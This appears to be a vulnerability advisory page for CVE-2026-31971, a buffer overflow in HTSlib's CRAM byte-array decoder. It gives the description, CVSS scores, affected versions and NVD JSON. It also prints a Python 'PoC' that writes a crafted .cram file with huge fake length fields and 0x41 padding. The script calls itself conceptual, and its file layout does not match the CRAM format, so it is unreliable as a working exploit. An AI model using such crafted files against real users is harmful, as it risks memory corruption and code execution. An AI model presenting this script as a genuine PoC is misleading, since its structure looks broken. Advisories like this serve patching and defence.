Security Vulnerability Report
中文
CVE-2026-31971 CVSS 8.1 HIGH

CVE-2026-31971

Published: 2026-03-18 20:16:22
Last Modified: 2026-03-19 13:58:32
Source: [email protected]

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_LEN` method, the `cram_byte_array_len_decode()` failed to validate that the amount of data being unpacked matched the size of the output buffer where it was to be stored. Depending on the data series being read, this could result either in a heap or a stack overflow with attacker-controlled bytes. Depending on the data stream this could result either in a heap buffer overflow or a stack overflow. If a user opens a file crafted to exploit this issue it could lead to the program crashing, overwriting of data structures on the heap or stack in ways not expected by the program, or changing the control flow of the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE
HTSlib < 1.21.1
HTSlib < 1.22.2
HTSlib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-31971 PoC - HTSlib CRAM Buffer Overflow Note: This is a conceptual PoC for demonstration purposes """ import struct def generate_malicious_cram(): """ Generate a malicious CRAM file that triggers buffer overflow in cram_byte_array_len_decode() """ # CRAM file header header = b'CRAM' # Magic number # Container header container = bytearray() container += struct.pack('>I', 0x00000001) # Block content ID container += struct.pack('>I', 0xFFFFFFFF) # Compressed data size (malicious) # Malicious BYTE_ARRAY_LEN encoded data # This simulates a crafted data block that exceeds buffer size malicious_data = bytearray() malicious_data += b'\x00' # Encoding type for BYTE_ARRAY_LEN malicious_data += struct.pack('>Q', 0xFFFFFFFFFFFFFFFF) # Fake length malicious_data += b'\x41' * 0x1000 # Overflow data # File container cram_file = header + container + malicious_data return cram_file def main(): print("[*] Generating malicious CRAM file for CVE-2026-31971") poc_data = generate_malicious_cram() with open('CVE-2026-31971_poc.cram', 'wb') as f: f.write(poc_data) print("[+] PoC file generated: CVE-2026-31971_poc.cram") print("[*] When opened by a vulnerable version of HTSlib,") print(" this file may trigger heap/stack buffer overflow") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31971", "sourceIdentifier": "[email protected]", "published": "2026-03-18T20:16:22.243", "lastModified": "2026-03-19T13:58:31.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_LEN` method, the `cram_byte_array_len_decode()` failed to validate that the amount of data being unpacked matched the size of the output buffer where it was to be stored. Depending on the data series being read, this could result either in a heap or a stack overflow with attacker-controlled bytes. Depending on the data stream this could result either in a heap buffer overflow or a stack overflow. If a user opens a file crafted to exploit this issue it could lead to the program crashing, overwriting of data structures on the heap or stack in ways not expected by the program, or changing the control flow of the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo de bioinformática. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN utilizando una variedad de codificaciones y métodos de compresión. Al leer datos codificados utilizando el método 'BYTE_ARRAY_LEN', la función 'cram_byte_array_len_decode()' no validó que la cantidad de datos que se estaban desempaquetando coincidiera con el tamaño del búfer de salida donde se iba a almacenar. Dependiendo de la serie de datos que se leyera, esto podría resultar en un desbordamiento de montón o un desbordamiento de pila con bytes controlados por el atacante. Dependiendo del flujo de datos, esto podría resultar en un desbordamiento de búfer en el montón o un desbordamiento de pila. Si un usuario abre un archivo diseñado para explotar este problema, podría provocar el bloqueo del programa, la sobrescritura de estructuras de datos en el montón o la pila de maneras no esperadas por el programa, o el cambio del flujo de control del programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}, {"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*: ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.